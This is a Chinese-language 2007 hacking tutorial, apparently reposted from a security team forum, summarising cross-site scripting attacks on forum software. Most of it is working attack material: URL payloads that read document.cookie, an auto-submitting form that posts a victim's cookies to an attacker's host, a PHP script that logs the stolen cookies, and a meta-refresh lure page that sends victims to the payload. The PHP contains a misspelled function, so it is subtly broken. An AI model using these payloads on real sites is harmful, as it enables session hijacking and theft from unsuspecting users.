跨站脚本攻击,一些跨站脚本攻击的总结

一些跨站脚本攻击的总结 - 网络安全 - 电脑教程网

一些跨站脚本攻击的总结

日期:2007-05-17   荐:
文章作者:冰血封情[EST]
信息来源:EvilOctal Security Team(www.EvilOctal.com)

注意:这文章有局限性 但是毕竟是针对我个人的空间的情况而定义的 本来就是我个人的技术总结么 其他人生死冰血封情可就不管了 抱歉哦

以动网为例子通过简单构造弹出cookies的url来检测漏洞是否存在:

http://www.target.com/bbs/target.ASP?Errcodes=<script>alert(document.cookie)</script>&action=otherErr

以上将弹出本地用户的cookies 下面重定向地址到邪恶八进制

http://www.target.com/bbs/target.asp?Errcodes=<script>document.location='[url]http://www.EvilOctal.com[/url]'</script>&action=otherErr

其实方法在这里 PHP如果过滤不严 也大同小异

http://www.target.com/bbs/target.php/"><script>alert(document.cookie)</script>

下面是经典用法 构造链接盗取cookies 这里以php空间为例子 谁让偶的是bsd+mysql+php空间呢:
仍以动网为例子 构造如下链接 别以为我说的是动网哦 相信聪明的你很容易明白的^_^

http://www.target.com/bbs/target.asp?Errcodes=<script>document.location='[url]http://www.SecurityPeak.com/cookie.asp?[/url]'%2B.</script>&action=otherErr

很遗憾 有的时候没那么好:(
第一 有可能受到主机安全限制无法执行以上的url 比如php中那个恶心的斜杠
第二 没有一个白痴会像流氓豆(嘿嘿 对Etern4lCn进行一下人身攻击)一样去点这么奇怪的一个地址链接

好!首先来如何解决一...突破PHP安全限制:

http://www.target.com/bbs/target.php/"><form name=EvilOctal method=post action=http://www.EvilOctal.com/cookie.php>
<input type=txt name=info><input type=submit value=EvilOctal></form>
<script>
document.EvilOctal.info.value=document.cookie;
document.EvilOctal.submit();
</script>

以下我们来看看cookie.php的内容 因为cookie在远程提交的时候 必需有负责接收的:

<?php
$info = getenv("QUERY_STRING");
if ($info) {
$info=urldecode($info);
$fp = fopen("info.txt","a");
fwirte($fp,$info."\n\n\n\n");
fclose($fp);
header("Location:[url]http://www.EvilOctal.com/news.htm[/url]");
}
?>

这样第一个问题就完美解决:)
现在我们来看看第二个 嘿嘿 其实上面一经解决了 只要大家看看美丽的news.htm的内容就知道了:

<meta http-equiv="refresh" content="1;url=http://www.target.com/bbs/target.asp?Errcodes=<script>document.location='[url]http://www.EvilOctal.com/cookie.php?[/url]'%2Bdocument.cookie</script>&action=otherErr>


现在明白了么?其实关键就在那个cookie.php 欺骗的关键 这样针对跨站脚本攻击中最敏感的部分冰血封情就总结完了 欢迎来到邪恶八进制 论坛地址自己找...
Have fun:)

(出处:http://www.sheup.com)




标签: